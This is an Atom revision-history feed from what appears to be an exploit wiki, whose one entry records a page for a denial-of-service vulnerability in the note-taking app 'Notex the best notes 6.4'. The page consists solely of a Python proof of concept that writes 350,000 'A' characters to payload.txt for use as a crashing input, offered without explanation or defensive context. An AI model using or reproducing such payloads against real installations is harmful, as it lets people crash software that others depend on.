<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Notex_the_best_notes_6.4_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E</id>
	<title>Notex the best notes 6.4 拒絕服務漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Notex_the_best_notes_6.4_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Notex_the_best_notes_6.4_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T08:04:10Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Notex_the_best_notes_6.4_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=5072&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC== &lt;pre&gt; #!/usr/bin/env python buffer = &quot;\x41&quot; * 350000  try: f = open(&quot;payload.txt&quot;,&quot;w&quot;) f.write(buffer) f.close() print (&quot;File created&quot;) except: print (&quot;File cannot be...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Notex_the_best_notes_6.4_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=5072&amp;oldid=prev"/>
		<updated>2021-06-15T01:31:28Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC== &amp;lt;pre&amp;gt; #!/usr/bin/env python buffer = &amp;quot;\x41&amp;quot; * 350000  try: f = open(&amp;quot;payload.txt&amp;quot;,&amp;quot;w&amp;quot;) f.write(buffer) f.close() print (&amp;quot;File created&amp;quot;) except: print (&amp;quot;File cannot be...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
buffer = &amp;quot;\x41&amp;quot; * 350000&lt;br /&gt;
&lt;br /&gt;
try:&lt;br /&gt;
f = open(&amp;quot;payload.txt&amp;quot;,&amp;quot;w&amp;quot;)&lt;br /&gt;
f.write(buffer)&lt;br /&gt;
f.close()&lt;br /&gt;
print (&amp;quot;File created&amp;quot;)&lt;br /&gt;
except:&lt;br /&gt;
print (&amp;quot;File cannot be created&amp;quot;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>